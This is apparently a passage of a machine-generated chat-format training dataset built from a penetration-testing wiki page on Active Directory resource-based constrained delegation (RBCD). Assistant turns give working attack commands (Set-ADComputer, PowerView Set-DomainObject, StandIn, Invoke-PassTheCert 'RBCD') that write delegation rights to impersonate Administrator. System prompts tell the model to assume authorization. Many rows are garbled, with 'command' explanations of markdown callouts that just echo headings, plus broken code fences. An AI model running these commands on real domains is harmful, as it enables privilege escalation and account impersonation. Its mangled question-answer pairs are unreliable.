a pentest?"}, {"role": "assistant", "content": "> [!SUCCESS]\n> Testers can also use [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) to set the delegation rights with the `--delegate-access` option when conducting this attack from a [relayed authentication](../../ntlm/relay.md).\n\n> [!TIP]\n> In this example, `controlledaccount` can be [a computer account created for the attack](../../builtins/machineaccountquota.md#create-a-computer-account), or any other account -with at least one Service Principal Name set for the usual technique, or without for [SPN-less RBCD](rbcd.md#rbcd-on-spn-less-users)- which credentials are known to the attacker.\n\n---\n**Step 2**: obtain a ticket (delegation operation) :ticket: \n\nOnce the attribute has been modified, the [Impacket](https://github.com/SecureAuthCorp/impacket) script [getST](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python) can then perform all the necessary steps to obtain the final \"impersonating\" ST (in this case, \"Administrator\" is impersonated but it can be any user in the environment)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity during a pentest?", "response": "> [!SUCCESS]\n> Testers can also use [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) to set the delegation rights with the `--delegate-access` option when conducting this attack from a [relayed authentication](../../ntlm/relay.md).\n\n> [!TIP]\n> In this example, `controlledaccount` can be [a computer account created for the attack](../../builtins/machineaccountquota.md#create-a-computer-account), or any other account -with at least one Service Principal Name set for the usual technique, or without for [SPN-less RBCD](rbcd.md#rbcd-on-spn-less-users)- which credentials are known to the attacker.\n\n---\n**Step 2**: obtain a ticket (delegation operation) :ticket: \n\nOnce the attribute has been modified, the [Impacket](https://github.com/SecureAuthCorp/impacket) script [getST](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python) can then perform all the necessary steps to obtain the final \"impersonating\" ST (in this case, \"Administrator\" is impersonated but it can be any user in the environment).", "metadata": {"corpus_index": 543, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!SUCCESS]`?"}, {"role": "assistant", "content": "This command is used for append value to the msds-allowedtoactonbehalfofotheridentity. Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!SUCCESS]`?", "response": "This command is used for append value to the msds-allowedtoactonbehalfofotheridentity. Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity", "metadata": {"corpus_index": 543, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity"}, {"role": "assistant", "content": "> [!CAUTION]\n> In [some cases](./#theory), the delegation will not work. Depending on the context, the [bronze bit ](bronze-bit.md)vulnerability (CVE-2020-17049) can be used with the `-force-forwardable` option to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)). There however scenarios where the SPN can be changed ([AnySPN](../ptt.md#modifying-the-spn)) to access more service. This technique is automatically tried by Impacket scripts when doing pass-the-ticket.\n\n---\n**Step 3**: Pass-the-ticket :passport_control: \n\nOnce the ticket is obtained, it can be used with [pass-the-ticket](../ptt.md).\n\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the [user impersonation](../../credentials/impersonation.md) part.\n\n**Step 1**: edit the target's \"rbcd\" attribute ([DACL abuse](../../dacl/)) :pencil2: \n\nThe [PowerShell ActiveDirectory module](https://docs.microsoft.com/en-us/powershell/module/addsadministration/?view=win10-ps)'s cmdlets Set-ADComputer and Get-ADComputer can be used to write and read the attributed of an object (in this case, to modify the delegation rights)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity", "response": "> [!CAUTION]\n> In [some cases](./#theory), the delegation will not work. Depending on the context, the [bronze bit ](bronze-bit.md)vulnerability (CVE-2020-17049) can be used with the `-force-forwardable` option to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)). There however scenarios where the SPN can be changed ([AnySPN](../ptt.md#modifying-the-spn)) to access more service. This technique is automatically tried by Impacket scripts when doing pass-the-ticket.\n\n---\n**Step 3**: Pass-the-ticket :passport_control: \n\nOnce the ticket is obtained, it can be used with [pass-the-ticket](../ptt.md).\n\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the [user impersonation](../../credentials/impersonation.md) part.\n\n**Step 1**: edit the target's \"rbcd\" attribute ([DACL abuse](../../dacl/)) :pencil2: \n\nThe [PowerShell ActiveDirectory module](https://docs.microsoft.com/en-us/powershell/module/addsadministration/?view=win10-ps)'s cmdlets Set-ADComputer and Get-ADComputer can be used to write and read the attributed of an object (in this case, to modify the delegation rights).", "metadata": {"corpus_index": 544, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!CAUTION]`?"}, {"role": "assistant", "content": "This command is used for append value to the msds-allowedtoactonbehalfofotheridentity. Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!CAUTION]`?", "response": "This command is used for append value to the msds-allowedtoactonbehalfofotheridentity. Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity", "metadata": {"corpus_index": 544, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Read the security descriptor in the context of penetration testing"}, {"role": "assistant", "content": "Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Read the security descriptor in the context of penetration testing", "response": "Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount", "metadata": {"corpus_index": 545, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Read the security descriptor?"}, {"role": "assistant", "content": "Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Read the security descriptor?", "response": "Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount", "metadata": {"corpus_index": 545, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Populate the msDS-AllowedToActOnBehalfOfOtherIdentity?"}, {"role": "assistant", "content": "Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount 'controlledaccountwithSPN'\n``\n\nPowerSploit's PowerView module is an alternative that can be used to edit the attribute (source).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Populate the msDS-AllowedToActOnBehalfOfOtherIdentity?", "response": "Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount 'controlledaccountwithSPN'\n``\n\nPowerSploit's PowerView module is an alternative that can be used to edit the attribute (source).\n\n``bash", "metadata": {"corpus_index": 546, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Populate the msDS-AllowedToActOnBehalfOfOtherIdentity during a pentest?"}, {"role": "assistant", "content": "Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount 'controlledaccountwithSPN'\n``\n\nPowerSploit's PowerView module is an alternative that can be used to edit the attribute (source).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Populate the msDS-AllowedToActOnBehalfOfOtherIdentity during a pentest?", "response": "Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount 'controlledaccountwithSPN'\n``\n\nPowerSploit's PowerView module is an alternative that can be used to edit the attribute (source).\n\n``bash", "metadata": {"corpus_index": 546, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Populate the msDS-AllowedToActOnBehalfOfOtherIdentity"}, {"role": "assistant", "content": "PowerSploit's [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) module is an alternative that can be used to edit the attribute ([source](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/))."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Populate the msDS-AllowedToActOnBehalfOfOtherIdentity", "response": "PowerSploit's [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) module is an alternative that can be used to edit the attribute ([source](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/)).", "metadata": {"corpus_index": 547, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `PowerSploit's [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) module is an alternative that can be used to edit the attribute ([source](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/)).`?"}, {"role": "assistant", "content": "This command is used for populate the msds-allowedtoactonbehalfofotheridentity. Populate the msDS-AllowedToActOnBehalfOfOtherIdentity"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `PowerSploit's [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) module is an alternative that can be used to edit the attribute ([source](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/)).`?", "response": "This command is used for populate the msds-allowedtoactonbehalfofotheridentity. Populate the msDS-AllowedToActOnBehalfOfOtherIdentity", "metadata": {"corpus_index": 547, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Obtain the SID of the controlled account with SPN (e.g. Computer account)?"}, {"role": "assistant", "content": "$ComputerSid = Get-DomainComputer \"controlledaccountwithSPN\" -Properties objectsid | Select -Expand objectsid"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Obtain the SID of the controlled account with SPN (e.g. Computer account)?", "response": "$ComputerSid = Get-DomainComputer \"controlledaccountwithSPN\" -Properties objectsid | Select -Expand objectsid", "metadata": {"corpus_index": 548, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Obtain the SID of the controlled account with SPN (e.g. Computer account)"}, {"role": "assistant", "content": "$ComputerSid = Get-DomainComputer \"controlledaccountwithSPN\" -Properties objectsid | Select -Expand objectsid"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Obtain the SID of the controlled account with SPN (e.g. Computer account)", "response": "$ComputerSid = Get-DomainComputer \"controlledaccountwithSPN\" -Properties objectsid | Select -Expand objectsid", "metadata": {"corpus_index": 548, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE in the context of penetration testing"}, {"role": "assistant", "content": "$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))\"\n$SDBytes = New-Object byte[] ($SD.BinaryLength)\n$SD.GetBinaryForm($SDBytes, 0)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE in the context of penetration testing", "response": "$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))\"\n$SDBytes = New-Object byte[] ($SD.BinaryLength)\n$SD.GetBinaryForm($SDBytes, 0)", "metadata": {"corpus_index": 549, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE"}, {"role": "assistant", "content": "$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))\"\n$SDBytes = New-Object byte[] ($SD.BinaryLength)\n$SD.GetBinaryForm($SDBytes, 0)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE", "response": "$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))\"\n$SDBytes = New-Object byte[] ($SD.BinaryLength)\n$SD.GetBinaryForm($SDBytes, 0)", "metadata": {"corpus_index": 549, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account in the context of penetration testing"}, {"role": "assistant", "content": "Get-DomainComputer \"target$\" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}\n``\n\nFuzzSecurity's StandIn project is another alternative in C# (.NET assembly) to edit the attribute (source).\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account in the context of penetration testing", "response": "Get-DomainComputer \"target$\" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}\n``\n\nFuzzSecurity's StandIn project is another alternative in C# (.NET assembly) to edit the attribute (source).\n\n``powershell", "metadata": {"corpus_index": 550, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account"}, {"role": "assistant", "content": "Get-DomainComputer \"target$\" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}\n``\n\nFuzzSecurity's StandIn project is another alternative in C# (.NET assembly) to edit the attribute (source).\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account", "response": "Get-DomainComputer \"target$\" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}\n``\n\nFuzzSecurity's StandIn project is another alternative in C# (.NET assembly) to edit the attribute (source).\n\n``powershell", "metadata": {"corpus_index": 550, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account during a pentest?"}, {"role": "assistant", "content": "FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) project is another alternative in C# (.NET assembly) to edit the attribute ([source](https://github.com/FuzzySecurity/StandIn#add-msds-allowedtoactonbehalfofotheridentity))."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account during a pentest?", "response": "FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) project is another alternative in C# (.NET assembly) to edit the attribute ([source](https://github.com/FuzzySecurity/StandIn#add-msds-allowedtoactonbehalfofotheridentity)).", "metadata": {"corpus_index": 551, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) project is another alternative in C# (.NET assembly) to edit the attribute ([source](https://github.com/FuzzySecurity/StandIn#add-msds-allowedtoactonbehalfofotheridentity)).`?"}, {"role": "assistant", "content": "This command is used for set sd in the msds-allowedtoactonbehalfofotheridentity field of the target comptuer account. set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) project is another alternative in C# (.NET assembly) to edit the attribute ([source](https://github.com/FuzzySecurity/StandIn#add-msds-allowedtoactonbehalfofotheridentity)).`?", "response": "This command is used for set sd in the msds-allowedtoactonbehalfofotheridentity field of the target comptuer account. set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account", "metadata": {"corpus_index": 551, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Obtain the SID of the controlled account with SPN (e.g. Computer account)"}, {"role": "assistant", "content": "StandIn.exe --object samaccountname=controlledaccountwithSPNName"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Obtain the SID of the controlled account with SPN (e.g. Computer account)", "response": "StandIn.exe --object samaccountname=controlledaccountwithSPNName", "metadata": {"corpus_index": 552, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Obtain the SID of the controlled account with SPN (e.g. Computer account)"}, {"role": "assistant", "content": "StandIn.exe --object samaccountname=controlledaccountwithSPNName"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Obtain the SID of the controlled account with SPN (e.g. Computer account)", "response": "StandIn.exe --object samaccountname=controlledaccountwithSPNName", "metadata": {"corpus_index": 552, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Add the object to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer"}, {"role": "assistant", "content": "StandIn.exe --computer \"target\" --sid \"controlledaccountwithSPN's SID\"\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Add the object to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer", "response": "StandIn.exe --computer \"target\" --sid \"controlledaccountwithSPN's SID\"\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 553, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Add the object to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer"}, {"role": "assistant", "content": "StandIn.exe --computer \"target\" --sid \"controlledaccountwithSPN's SID\"\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Add the object to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer", "response": "StandIn.exe --computer \"target\" --sid \"controlledaccountwithSPN's SID\"\n``\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert.\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 553, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$)"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'RBCD' -Identity 'CN=WANHADELHEG,CN=Computers,DC=X' -Target 'CN=RBESEEDEE,CN=Computers,DC=X'\n``\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nRubeus can then be used to request the TGT and \"impersonation ST\", and inject it for later use.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$)", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'RBCD' -Identity 'CN=WANHADELHEG,CN=Computers,DC=X' -Target 'CN=RBESEEDEE,CN=Computers,DC=X'\n``\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nRubeus can then be used to request the TGT and \"impersonation ST\", and inject it for later use.\n\n``powershell", "metadata": {"corpus_index": 554, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and 